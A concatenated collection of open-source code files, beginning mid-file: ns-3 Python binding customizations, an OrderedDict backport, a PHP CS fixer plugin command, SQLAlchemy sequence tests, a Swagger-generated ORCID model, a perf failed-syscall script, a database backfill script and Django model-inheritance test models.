PyGILState_Release(__py_gil_state);
}
virtual bool IsEqual(ns3::Ptr<const ns3::CallbackImplBase> other_base) const
{
const %s *other = dynamic_cast<const %s*> (ns3::PeekPointer (other_base));
if (other != NULL)
return (other->m_callback == m_callback);
else
return false;
}
''' % (class_name, ', '.join(template_parameters), class_name, class_name, class_name, class_name))
sink.indent()
callback_return = template_parameters[0]
return_ctype = ctypeparser.parse_type(callback_return)
if ('const' in return_ctype.remove_modifiers()):
kwargs = {'is_const': True}
else:
kwargs = {}
try:
return_type = ReturnValue.new(str(return_ctype), **kwargs)
except (typehandlers.TypeLookupError, typehandlers.TypeConfigurationError) as ex:
warnings.warn("***** Unable to register callback; Return value '%s' error (used in %s): %r"
% (callback_return, cls_name, ex),
Warning)
continue
arguments = []
ok = True
callback_parameters = [arg for arg in template_parameters[1:] if arg != 'ns3::empty']
for arg_num, arg_type in enumerate(callback_parameters):
arg_name = 'arg%i' % (arg_num+1)
param_ctype = ctypeparser.parse_type(arg_type)
if ('const' in param_ctype.remove_modifiers()):
kwargs = {'is_const': True}
else:
kwargs = {}
try:
arguments.append(Parameter.new(str(param_ctype), arg_name, **kwargs))
except (typehandlers.TypeLookupError, typehandlers.TypeConfigurationError) as ex:
warnings.warn("***** Unable to register callback; parameter '%s %s' error (used in %s): %r"
% (arg_type, arg_name, cls_name, ex),
Warning)
ok = False
if not ok:
try:
typehandlers.return_type_matcher.lookup(cls_name)[0].DISABLED = True
except typehandlers.TypeLookupError:
pass
try:
typehandlers.param_type_matcher.lookup(cls_name)[0].DISABLED = True
except typehandlers.TypeLookupError:
pass
continue
wrapper = CallbackImplProxyMethod(return_type, arguments)
wrapper.generate(sink, 'operator()', decl_modifiers=[])
sink.unindent()
sink.writeln('};\n')
print("Flushing to ", out, file=sys.stderr)
sink.flush_to(out)
# def write_preamble(out):
# pybindgen.write_preamble(out)
# out.writeln("#include \"ns3/everything.h\"")
def Simulator_customizations(module):
Simulator = module['ns3::Simulator']
## Simulator::Schedule(delay, callback, ...user..args...)
Simulator.add_custom_method_wrapper("Schedule", "_wrap_Simulator_Schedule",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
## Simulator::ScheduleNow(callback, ...user..args...)
Simulator.add_custom_method_wrapper("ScheduleNow", "_wrap_Simulator_ScheduleNow",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
## Simulator::ScheduleDestroy(callback, ...user..args...)
Simulator.add_custom_method_wrapper("ScheduleDestroy", "_wrap_Simulator_ScheduleDestroy",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
Simulator.add_custom_method_wrapper("Run", "_wrap_Simulator_Run",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
def CommandLine_customizations(module):
CommandLine = module['ns3::CommandLine']
CommandLine.add_method('Parse', None, [ArgvParam(None, 'argv')],
is_static=False)
CommandLine.add_custom_method_wrapper("AddValue", "_wrap_CommandLine_AddValue",
flags=["METH_VARARGS", "METH_KEYWORDS"])
def Object_customizations(module):
## ---------------------------------------------------------------------
## Here we generate custom constructor code for all classes that
## derive from ns3::Object. The custom constructors are needed in
## order to support kwargs only and to translate kwargs into ns3
## attributes, etc.
## ---------------------------------------------------------------------
try:
Object = module['ns3::Object']
except KeyError:
return
## add a GetTypeId method to all generatd helper classes
def helper_class_hook(helper_class):
decl = """
static ns3::TypeId GetTypeId (void)
{
static ns3::TypeId tid = ns3::TypeId ("%s")
.SetParent< %s > ()
;
return tid;
}""" % (helper_class.name, helper_class.class_.full_name)
helper_class.add_custom_method(decl)
helper_class.add_post_generation_code(
"NS_OBJECT_ENSURE_REGISTERED (%s);" % helper_class.name)
Object.add_helper_class_hook(helper_class_hook)
def ns3_object_instance_creation_function(cpp_class, code_block, lvalue,
parameters, construct_type_name):
assert lvalue
assert not lvalue.startswith('None')
if cpp_class.cannot_be_constructed:
raise CodeGenerationError("%s cannot be constructed (%s)"
% cpp_class.full_name)
if cpp_class.incomplete_type:
raise CodeGenerationError("%s cannot be constructed (incomplete type)"
% cpp_class.full_name)
code_block.write_code("%s = new %s(%s);" % (lvalue, construct_type_name, parameters))
code_block.write_code("%s->Ref ();" % (lvalue))
def ns3_object_post_instance_creation_function(cpp_class, code_block, lvalue,
parameters, construct_type_name):
code_block.write_code("ns3::CompleteConstruct(%s);" % (lvalue, ))
Object.set_instance_creation_function(ns3_object_instance_creation_function)
Object.set_post_instance_creation_function(ns3_object_post_instance_creation_function)
def Attribute_customizations(module):
# Fix up for the "const AttributeValue &v = EmptyAttribute()"
# case, as used extensively by helper classes.
# Here's why we need to do this: pybindgen.gccxmlscanner, when
# scanning parameter default values, is only provided with the
# value as a simple C expression string. (py)gccxml does not
# report the type of the default value.
# As a workaround, here we iterate over all parameters of all
# methods of all classes and tell pybindgen what is the type of
# the default value for attributes.
for cls in module.classes:
for meth in cls.get_all_methods():
for param in meth.parameters:
if isinstance(param, cppclass.CppClassRefParameter):
if param.cpp_class.name == 'AttributeValue' \
and param.default_value is not None \
and param.default_value_type is None:
param.default_value_type = 'ns3::EmptyAttributeValue'
def TypeId_customizations(module):
TypeId = module['ns3::TypeId']
TypeId.add_custom_method_wrapper("LookupByNameFailSafe", "_wrap_TypeId_LookupByNameFailSafe",
flags=["METH_VARARGS", "METH_KEYWORDS", "METH_STATIC"])
def add_std_ofstream(module):
module.add_include('<fstream>')
ostream = module.add_class('ostream', foreign_cpp_namespace='::std')
ostream.set_cannot_be_constructed("abstract base class")
ofstream = module.add_class('ofstream', foreign_cpp_namespace='::std', parent=ostream)
ofstream.add_enum('openmode', [
('app', 'std::ios_base::app'),
('ate', 'std::ios_base::ate'),
('binary', 'std::ios_base::binary'),
('in', 'std::ios_base::in'),
('out', 'std::ios_base::out'),
('trunc', 'std::ios_base::trunc'),
])
ofstream.add_constructor([Parameter.new("const char *", 'filename'),
Parameter.new("::std::ofstream::openmode", 'mode', default_value="std::ios_base::out")])
ofstream.add_method('close', None, [])
add_std_ios_openmode(module)
class IosOpenmodeParam(Parameter):
DIRECTIONS = [Parameter.DIRECTION_IN]
CTYPES = ['std::ios::openmode', 'std::_Ios_Openmode']
def convert_c_to_python(self, wrapper):
assert isinstance(wrapper, ReverseWrapperBase)
wrapper.build_params.add_parameter('i', [self.value])
def convert_python_to_c(self, wrapper):
assert isinstance(wrapper, ForwardWrapperBase)
name = wrapper.declarations.declare_variable("std::ios::openmode", self.name, self.default_value)
wrapper.parse_params.add_parameter('i', ['&'+name], self.name, optional=bool(self.default_value))
wrapper.call_params.append(name)
def add_std_ios_openmode(module):
for flag in 'in', 'out', 'ate', 'app', 'trunc', 'binary':
module.after_init.write_code('PyModule_AddIntConstant(m, (char *) "STD_IOS_%s", std::ios::%s);'
% (flag.upper(), flag))
def add_ipv4_address_tp_hash(module):
module.body.writeln('''
long
_ns3_Ipv4Address_tp_hash (PyObject *obj)
{
PyNs3Ipv4Address *addr = reinterpret_cast<PyNs3Ipv4Address *> (obj);
return static_cast<long> (ns3::Ipv4AddressHash () (*addr->obj));
}
''')
module.header.writeln('long _ns3_Ipv4Address_tp_hash (PyObject *obj);')
module['Ipv4Address'].pytype.slots['tp_hash'] = "_ns3_Ipv4Address_tp_hash"
| gpl-2.0 |
hnoerdli/hussa | node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/ordered_dict.py | 2354 | 10366 | # Unmodified from http://code.activestate.com/recipes/576693/
# other than to add MIT license header (as specified on page, but not in code).
# Linked from Python documentation here:
# http://docs.python.org/2/library/collections.html#collections.OrderedDict
#
# This should be deleted once Py2.7 is available on all bots, see
# http://crbug.com/241769.
#
# Copyright (c) 2009 Raymond Hettinger.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
# Suppress 'OrderedDict.update: Method has no argument':
# pylint: disable=E0211
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
| mit |
prisis/sublime-text-packages | Packages/anaconda_php/plugin/handlers_php/commands/php_cs_fixer.py | 3 | 1841 |
# Copyright (C) 2014 - Oscar Campos <[email protected]>
# This program is Free Software see LICENSE file for details
import os
import sys
import logging
import traceback
import subprocess
from commands.base import Command
from process import spawn
PIPE = subprocess.PIPE
class PHPCSFixer(Command):
"""Run phpcs linter and return back results
"""
def __init__(self, callback, uid, vid, filename, settings):
self.vid = vid
self.settings = settings
self.filename = filename
super(PHPCSFixer, self).__init__(callback, uid)
def run(self):
"""Run the command
"""
try:
self.callback({
'success': True,
'output': self.phpcs_fixer(),
'uid': self.uid,
'vid': self.vid
})
except Exception as error:
logging.error(error)
logging.debug(traceback.format_exc())
print(traceback.format_exc())
self.callback({
'success': False,
'error': error,
'uid': self.uid,
'vid': self.vid
})
def phpcs_fixer(self):
"""Run the php-cs-fixer command in a file
"""
phpcs_fixer = os.path.join(
os.path.dirname(__file__), '../linting/phpcs_fixer/php-cs-fixer')
args = [
'php', '-n', phpcs_fixer, 'fix', self.filename, '--level=all',
'-{}'.format(self.settings.get('phpcs_fixer_verbosity_level'), 'v')
] + self.settings.get('phpcs_fixer_additional_arguments', [])
proc = spawn(args, stdout=PIPE, stderr=PIPE, cwd=os.getcwd())
output, error = proc.communicate()
if sys.version_info >= (3, 0):
output = output.decode('utf8')
return output
| mit |
Thraxis/SickRage | lib/sqlalchemy/testing/suite/test_sequence.py | 76 | 3770 | from .. import fixtures, config
from ..config import requirements
from ..assertions import eq_
from ... import testing
from ... import Integer, String, Sequence, schema
from ..schema import Table, Column
class SequenceTest(fixtures.TablesTest):
__requires__ = ('sequences',)
__backend__ = True
run_create_tables = 'each'
@classmethod
def define_tables(cls, metadata):
Table('seq_pk', metadata,
Column('id', Integer, Sequence('tab_id_seq'), primary_key=True),
Column('data', String(50))
)
Table('seq_opt_pk', metadata,
Column('id', Integer, Sequence('tab_id_seq', optional=True),
primary_key=True),
Column('data', String(50))
)
def test_insert_roundtrip(self):
config.db.execute(
self.tables.seq_pk.insert(),
data="some data"
)
self._assert_round_trip(self.tables.seq_pk, config.db)
def test_insert_lastrowid(self):
r = config.db.execute(
self.tables.seq_pk.insert(),
data="some data"
)
eq_(
r.inserted_primary_key,
[1]
)
def test_nextval_direct(self):
r = config.db.execute(
self.tables.seq_pk.c.id.default
)
eq_(
r, 1
)
@requirements.sequences_optional
def test_optional_seq(self):
r = config.db.execute(
self.tables.seq_opt_pk.insert(),
data="some data"
)
eq_(
r.inserted_primary_key,
[1]
)
def _assert_round_trip(self, table, conn):
row = conn.execute(table.select()).first()
eq_(
row,
(1, "some data")
)
class HasSequenceTest(fixtures.TestBase):
__requires__ = 'sequences',
__backend__ = True
def test_has_sequence(self):
s1 = Sequence('user_id_seq')
testing.db.execute(schema.CreateSequence(s1))
try:
eq_(testing.db.dialect.has_sequence(testing.db,
'user_id_seq'), True)
finally:
testing.db.execute(schema.DropSequence(s1))
@testing.requires.schemas
def test_has_sequence_schema(self):
s1 = Sequence('user_id_seq', schema="test_schema")
testing.db.execute(schema.CreateSequence(s1))
try:
eq_(testing.db.dialect.has_sequence(testing.db,
'user_id_seq', schema="test_schema"), True)
finally:
testing.db.execute(schema.DropSequence(s1))
def test_has_sequence_neg(self):
eq_(testing.db.dialect.has_sequence(testing.db, 'user_id_seq'),
False)
@testing.requires.schemas
def test_has_sequence_schemas_neg(self):
eq_(testing.db.dialect.has_sequence(testing.db, 'user_id_seq',
schema="test_schema"),
False)
@testing.requires.schemas
def test_has_sequence_default_not_in_remote(self):
s1 = Sequence('user_id_seq')
testing.db.execute(schema.CreateSequence(s1))
try:
eq_(testing.db.dialect.has_sequence(testing.db, 'user_id_seq',
schema="test_schema"),
False)
finally:
testing.db.execute(schema.DropSequence(s1))
@testing.requires.schemas
def test_has_sequence_remote_not_in_default(self):
s1 = Sequence('user_id_seq', schema="test_schema")
testing.db.execute(schema.CreateSequence(s1))
try:
eq_(testing.db.dialect.has_sequence(testing.db, 'user_id_seq'),
False)
finally:
testing.db.execute(schema.DropSequence(s1))
| gpl-3.0 |
Royal-Society-of-New-Zealand/NZ-ORCID-Hub | orcid_api_v3/models/amount_v30_rc1.py | 1 | 3888 | # coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AmountV30Rc1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'value': 'str',
'currency_code': 'str'
}
attribute_map = {
'value': 'value',
'currency_code': 'currency-code'
}
def __init__(self, value=None, currency_code=None): # noqa: E501
"""AmountV30Rc1 - a model defined in Swagger""" # noqa: E501
self._value = None
self._currency_code = None
self.discriminator = None
if value is not None:
self.value = value
self.currency_code = currency_code
@property
def value(self):
"""Gets the value of this AmountV30Rc1. # noqa: E501
:return: The value of this AmountV30Rc1. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this AmountV30Rc1.
:param value: The value of this AmountV30Rc1. # noqa: E501
:type: str
"""
self._value = value
@property
def currency_code(self):
"""Gets the currency_code of this AmountV30Rc1. # noqa: E501
:return: The currency_code of this AmountV30Rc1. # noqa: E501
:rtype: str
"""
return self._currency_code
@currency_code.setter
def currency_code(self, currency_code):
"""Sets the currency_code of this AmountV30Rc1.
:param currency_code: The currency_code of this AmountV30Rc1. # noqa: E501
:type: str
"""
if currency_code is None:
raise ValueError("Invalid value for `currency_code`, must not be `None`") # noqa: E501
self._currency_code = currency_code
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AmountV30Rc1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AmountV30Rc1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| mit |
mark-adams/django-socialregistration | socialregistration/contrib/facebook/client.py | 8 | 1296 | from django.conf import settings
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from socialregistration.clients.oauth import OAuth2
from socialregistration.settings import SESSION_KEY
import json
import facebook
class Facebook(OAuth2):
client_id = getattr(settings, 'FACEBOOK_APP_ID', '')
secret = getattr(settings, 'FACEBOOK_SECRET_KEY', '')
scope = getattr(settings, 'FACEBOOK_REQUEST_PERMISSIONS', '')
auth_url = 'https://www.facebook.com/dialog/oauth'
access_token_url = 'https://graph.facebook.com/oauth/access_token'
graph = None
_user_info = None
def get_callback_url(self, **kwargs):
if self.is_https():
return 'https://%s%s' % (Site.objects.get_current().domain,
reverse('socialregistration:facebook:callback'))
return 'http://%s%s' % (Site.objects.get_current().domain,
reverse('socialregistration:facebook:callback'))
def get_user_info(self):
if self._user_info is None:
self.graph = facebook.GraphAPI(self._access_token)
self._user_info = self.graph.request('me')
return self._user_info
@staticmethod
def get_session_key():
return '%sfacebook' % SESSION_KEY
| mit |
Tesla-Redux-Devices/hells-Core-N6 | tools/perf/scripts/python/failed-syscalls-by-pid.py | 11180 | 2058 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
| gpl-2.0 |
stopstalk/stopstalk-deployment | private/scripts/extras/backfill_problem_id.py | 1 | 1859 | """
Copyright (c) 2015-2020 Raj Patel([email protected]), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import time
ptable = db.problem
stable = db.submission
links = db(ptable).select(ptable.id, ptable.link)
plink_to_id = dict([(x.link, x.id) for x in links])
BATCH_SIZE = 25000
for i in xrange(10000):
rows = db(stable).select(limitby=(i * BATCH_SIZE, (i + 1) * BATCH_SIZE))
print rows.first().id, rows.last().id,
updated = 0
for srecord in rows:
if srecord.problem_id is None and \
srecord.problem_link in plink_to_id:
srecord.update_record(problem_id=plink_to_id[srecord.problem_link])
updated += 1
if updated > 0:
db.commit()
time.sleep(0.1)
print "updated", updated
else:
print "no updates"
| mit |
lsqtongxin/django | tests/model_inheritance_regress/models.py | 243 | 5863 | from __future__ import unicode_literals
import datetime
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Place(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=80)
class Meta:
ordering = ('name',)
def __str__(self):
return "%s the place" % self.name
@python_2_unicode_compatible
class Restaurant(Place):
serves_hot_dogs = models.BooleanField(default=False)
serves_pizza = models.BooleanField(default=False)
def __str__(self):
return "%s the restaurant" % self.name
@python_2_unicode_compatible
class ItalianRestaurant(Restaurant):
serves_gnocchi = models.BooleanField(default=False)
def __str__(self):
return "%s the italian restaurant" % self.name
@python_2_unicode_compatible
class ParkingLot(Place):
# An explicit link to the parent (we can control the attribute name).
parent = models.OneToOneField(Place, models.CASCADE, primary_key=True, parent_link=True)
capacity = models.IntegerField()
def __str__(self):
return "%s the parking lot" % self.name
class ParkingLot2(Place):
# In lieu of any other connector, an existing OneToOneField will be
# promoted to the primary key.
parent = models.OneToOneField(Place, models.CASCADE)
class ParkingLot3(Place):
# The parent_link connector need not be the pk on the model.
primary_key = models.AutoField(primary_key=True)
parent = models.OneToOneField(Place, models.CASCADE, parent_link=True)
class ParkingLot4(models.Model):
# Test parent_link connector can be discovered in abstract classes.
parent = models.OneToOneField(Place, models.CASCADE, parent_link=True)
class Meta:
abstract = True
class ParkingLot4A(ParkingLot4, Place):
pass
class ParkingLot4B(Place, ParkingLot4):
pass
@python_2_unicode_compatible
class Supplier(models.Model):
name = models.CharField(max_length=50)
restaurant = models.ForeignKey(Restaurant, models.CASCADE)
def __str__(self):
return self.name
class Wholesaler(Supplier):
retailer = models.ForeignKey(Supplier, models.CASCADE, related_name='wholesale_supplier')
class Parent(models.Model):
created = models.DateTimeField(default=datetime.datetime.now)
class Child(Parent):
name = models.CharField(max_length=10)
class SelfRefParent(models.Model):
parent_data = models.IntegerField()
self_data = models.ForeignKey('self', models.SET_NULL, null=True)
class SelfRefChild(SelfRefParent):
child_data = models.IntegerField()
@python_2_unicode_compatible
class Article(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateTimeField()
class Meta:
ordering = ('-pub_date', 'headline')
def __str__(self):
return self.headline
class ArticleWithAuthor(Article):
author = models.CharField(max_length=100)
class M2MBase(models.Model):
articles = models.ManyToManyField(Article)
class M2MChild(M2MBase):
name = models.CharField(max_length=50)
class Evaluation(Article):
quality = models.IntegerField()
class Meta:
abstract = True
class QualityControl(Evaluation):
assignee = models.CharField(max_length=50)
@python_2_unicode_compatible
class BaseM(models.Model):
base_name = models.CharField(max_length=100)
def __str__(self):
return self.base_name
@python_2_unicode_compatible
class DerivedM(BaseM):
customPK = models.IntegerField(primary_key=True)
derived_name = models.CharField(max_length=100)
def __str__(self):
return "PK = %d, base_name = %s, derived_name = %s" % (
self.customPK, self.base_name, self.derived_name)
class AuditBase(models.Model):
planned_date = models.DateField()
class Meta:
abstract = True
verbose_name_plural = 'Audits'
class CertificationAudit(AuditBase):
class Meta(AuditBase.Meta):
abstract = True
class InternalCertificationAudit(CertificationAudit):
auditing_dept = models.CharField(max_length=20)
# Check that abstract classes don't get m2m tables autocreated.
@python_2_unicode_compatible
class Person(models.Model):
name = models.CharField(max_length=100)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
@python_2_unicode_compatible
class AbstractEvent(models.Model):
name = models.CharField(max_length=100)
attendees = models.ManyToManyField(Person, related_name="%(class)s_set")
class Meta:
abstract = True
ordering = ('name',)
def __str__(self):
return self.name
class BirthdayParty(AbstractEvent):
pass
class BachelorParty(AbstractEvent):
pass
class MessyBachelorParty(BachelorParty):
pass
# Check concrete -> abstract -> concrete inheritance
class SearchableLocation(models.Model):
keywords = models.CharField(max_length=256)
class Station(SearchableLocation):
name = models.CharField(max_length=128)
class Meta:
abstract = True
class BusStation(Station):
bus_routes = models.CommaSeparatedIntegerField(max_length=128)
inbound = models.BooleanField(default=False)
